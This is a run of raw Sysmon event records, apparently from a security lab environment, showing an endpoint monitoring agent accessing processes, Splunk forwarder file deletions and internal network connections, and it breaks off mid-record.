10341000x800000000000000044408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.384{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126307848C537EE0E0A1E8CC8B728701,SHA256=4D57FF3E8C54816633249462765D35E5B3DBD5A82DDBED8FC846B5BA26AD80F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.367{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:14.366{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000017078Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:15.666{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708C27B421631ACD64357B49EEF7E31C,SHA256=422946F2F5B031BA43C8856AC4A925C0F8690CAC2A279864878A83911D8DD14A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.803{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=267C40CE04C9324B948D65CAC2E7C762,SHA256=84FE28DDAE2ACE3DBE2DB25E3240DBEC21187D7EC5FB9F6DF1A5C7FB928EBB7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:13.527{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56385-false10.0.1.12-8000- 10341000x800000000000000044437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.024{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.022{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.020{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.017{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.015{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.012{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.010{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:15.003{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000017080Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:16.741{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B5727A8CA96EB1DEDF09AB52B0F090,SHA256=911CB93CC31519F6ECB2813D3BE8C6EA37AC3D72A7F1BEE0EAA89CA7BDCE8906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:16.852{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=013C19EFF39E4E8C87D72BF15776CB3E,SHA256=F74DB41A10F155B82FEDC300C2D1527BA780FA22C1304750B4E67A3D6E4FC38D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017079Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:16.433{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=AE85796FD9488E5257B42CDBDA71E888,SHA256=0A048521302AF68B5273360AE67047997F08A1134197C288C03DD6E8DC7CE877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:17.969{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC62D8331BD5C9BBB4896ED144C53BA1,SHA256=C0FA349CD08B1AA0E7F7352183A62AB247A721B012D4A67E5DAF2723B0846A9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017082Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:15.094{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50123-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017081Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:17.832{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCBE556CBA2593BAB69F1B94F318DF65,SHA256=6A63202B3F59972F1370279D7200D05EFB34BECBED69D203BE9A6C58428CF537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017083Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:18.910{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BA06001D7DAB1552449D3E1453722C,SHA256=5EEB26BC28540260DD4B105E3E6B2A9CBA0192D49B8268F0039DCA1D2D3FD268,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:18.877{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:18.877{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:19.068{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD334901EE5462534D31B7F1A6485532,SHA256=44CC1C334109603D5983A1EC515401DAEFB21B9274C7261C24A8CCA99CF755C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017086Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:19.782{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017085Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:19.782{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017084Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:19.782{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:18.661{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56386-false10.0.1.12-8000- 23542300x800000000000000044445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:20.111{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=953BC8FCE29D26291BC9B50460362EBC,SHA256=A1EA211DB0DA19EC0488C4D0B7EFD1A048627610E49CBE3305D3D9CBA4D9AFB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017087Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:20.000{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AF5A376A5D35A290451F1D598F8A911,SHA256=5257A9F785A8EA197A62CEDF009EA8CA419A9F89490580EBF3E4AC4C83817DC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:21.763{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:21.179{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4346A2FBE684CE204D8FA2814A61FE65,SHA256=2CFBBD9D803D134DD001277C551C6642796E83665E183E3C37C0CCDE1C80271E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017088Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:21.103{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EA7FE5EF1ABC5E5E6A9783E2027527,SHA256=5908C1F11BC7AAA52B18F52A4B4170F8859B508E94D3A61DF3AB2D62779A1CE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:22.234{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E38C91794F7B69FAF716DD927452D5,SHA256=6E7A8AAE58C24203C99F4C5EE69EE5EB02E9C6BD639ED6AED5C09F5EE4383682,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017121Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:21.044{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50124-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000017120Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:22.789{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program 